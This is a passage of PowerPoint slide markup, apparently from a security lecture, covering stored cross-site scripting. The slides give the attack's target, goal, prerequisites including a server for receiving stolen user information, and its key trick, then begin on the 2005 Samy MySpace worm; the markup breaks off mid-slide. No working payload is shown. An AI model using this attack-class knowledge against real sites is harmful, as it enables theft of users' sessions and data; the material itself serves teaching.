                  <a:pt x="112607" y="269858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71208" y="255803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36328" y="229444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12281" y="194765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="154806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="112607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14475" y="71208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40833" y="36329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75512" y="12281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157671" y="419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199069" y="14475"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9822">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85595DAF-58AC-0945-B6DF-A71CA3C8E892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2725738" y="2209800"/>
            <a:ext cx="3933825" cy="13223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3" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9EB6AFA-EDD4-7543-B88D-74AF410B8008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160810" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5A169C-DFE4-4941-AEE7-3B4B3839C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7269163" y="3298825"/>
            <a:ext cx="149383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7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225"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2563"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" b="1">
                <a:solidFill>
                  <a:srgbClr val="06BC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inject</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="101000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" b="1">
                <a:solidFill>
                  <a:srgbClr val="06BC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malicious  script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300">
              <a:latin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71C0D03-3E56-E44E-932A-CCB4D2C83044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="497599" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-5" dirty="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-325" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-15" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00DE300-BE0E-BD46-B926-6795378B5E03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2351088"/>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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90C8A9A-16B0-9B43-A51B-1E0FD2C03535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2292350"/>
            <a:ext cx="7766050" cy="755650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2920"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript-enabled </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>who</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>visits</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2920"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user-influenced </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6061BD4B-C4F1-0242-AABE-85F9ADBE08E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3441700"/>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61798" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6038057F-C7B9-2540-B3A5-DC2ED025C86F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3400425"/>
            <a:ext cx="81946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900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Run script in user’s browser with same access  as provided to server’s regular scripts (i.e., subvert SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2A0C70-A55F-F641-91B1-A786E77C8E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4530725"/>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61800" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB317F28-D272-B54D-9130-82A3A0A56AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4503738"/>
            <a:ext cx="803275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800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ability to leave content on the web server  (forums, comments, custom profiles)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53459A6E-6118-204C-97C0-04DB17E2BC1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5387975"/>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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45024D86-FAAF-A94C-9C74-35E7092B8283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="5327650"/>
            <a:ext cx="7548563" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Optional: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>receiving </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stolen user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644DB636-19F4-3947-80A3-06EB4F75E1D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="6115050"/>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61804" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EC37B84-D758-3D4F-951E-8FF5CE3EEE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="6091238"/>
            <a:ext cx="8786813"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800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key trick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Server fails to ensure uploaded content does not  contain embedded scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1588"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Where have we heard this before?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="270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C2C03E2-FB58-214A-A80F-39319D8F200A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="857250"/>
            <a:ext cx="9296400" cy="1692275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" spc="-210" dirty="0"/>
              <a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="45" dirty="0"/>
              <a:t>friend </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="95" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="-5" dirty="0"/>
              <a:t>mine, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="-80" dirty="0"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:endParaRPr sz="5500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECA7560-2816-904D-B63B-23CB8120603A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2278063"/>
            <a:ext cx="147637" cy="293687"/>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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{338D4938-BE29-DC4B-A01C-0F91D7E8250F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="2228850"/>
            <a:ext cx="9283700" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Samy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in his </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MySpace </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(2005)</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E238B67-DD52-4C41-9A95-8017D07528CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="2816225"/>
            <a:ext cx="149225"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6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FD25AA-E37F-804A-A8DF-A72C1A7FB5CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422400" y="2762250"/>
            <a:ext cx="6986588" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MySpace </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>servers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attempted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to filter it, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
